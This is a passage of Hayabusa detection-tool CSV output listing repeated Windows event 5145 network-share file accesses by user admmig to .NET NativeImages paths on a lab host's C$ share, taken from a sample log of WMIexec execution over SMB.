Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 